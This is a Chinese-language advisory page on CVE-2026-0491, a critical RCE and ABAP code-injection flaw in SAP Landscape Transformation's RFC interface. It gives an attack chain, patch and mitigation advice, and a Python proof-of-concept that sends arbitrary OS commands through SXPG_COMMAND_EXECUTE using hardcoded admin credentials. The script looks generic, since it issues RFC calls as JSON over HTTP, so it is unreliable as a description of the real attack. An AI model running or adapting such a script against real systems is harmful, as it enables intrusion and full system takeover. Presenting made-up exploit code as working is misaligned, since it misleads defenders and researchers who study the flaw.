IPBUF安全漏洞报告
English
CVE-2026-0491 CVSS 9.1 严重

CVE-2026-0491 SAP Landscape Transformation远程代码执行漏洞(严重)

披露日期: 2026-01-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-0491
漏洞类型
远程代码执行/ABAP代码注入/后门
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
SAP Landscape Transformation

相关标签

CVE-2026-0491SAPLandscape Transformation远程代码执行ABAP注入后门RFC接口

漏洞概述

SAP Landscape Transformation存在一个严重的安全漏洞,允许具有管理员权限的攻击者通过RFC接口利用暴露的功能模块,注入任意ABAP代码或操作系统命令。此漏洞本质上是一个后门,攻击者可以绕过系统的授权检查,从而获得对系统的完全控制。成功利用此漏洞可能导致机密数据泄露、系统完整性被破坏以及服务可用性中断。由于CVSS评分高达9.1,该漏洞被评定为严重等级,需要立即采取修复措施。

技术细节

该漏洞源于SAP Landscape Transformation通过RFC接口暴露的功能模块存在设计缺陷。攻击者需要具备管理员权限才能访问RFC接口。一旦获得访问权限,攻击者可以构造恶意请求,在功能模块中注入任意ABAP代码或执行操作系统命令。漏洞的核心问题在于授权检查机制被绕过,允许未授权的代码执行。攻击者可以利用此漏洞在SAP系统中执行任意操作,包括但不限于:读取敏感数据、修改系统配置、安装后门程序、获取操作系统级别的访问权限。

攻击链分析

STEP 1
步骤1
攻击者获得SAP Landscape Transformation的管理员凭据或会话
STEP 2
步骤2
通过RFC接口访问暴露的功能模块
STEP 3
步骤3
构造恶意请求注入ABAP代码或操作系统命令
STEP 4
步骤4
绕过授权检查执行注入的代码
STEP 5
步骤5
获得系统完全控制权,实现持久化访问

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2026-0491 PoC # Target: SAP Landscape Transformation RFC Interface def exploit_rce(target_url, command): headers = { 'Content-Type': 'application/json', 'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ=' # admin:password } payload = { 'method': 'SXPG_COMMAND_EXECUTE', 'params': { 'COMMANDNAME': command } } response = requests.post(target_url, json=payload, headers=headers, verify=False) return response.text if __name__ == '__main__': if len(sys.argv) != 3: print('Usage: python cve-2026-0491.py <target_url> <command>') sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] result = exploit_rce(target, cmd) print(result)

影响范围

SAP Landscape Transformation所有版本

防御指南

临时缓解措施
立即应用SAP安全补丁3697979,限制RFC接口访问权限,启用系统安全审计,监控异常访问行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表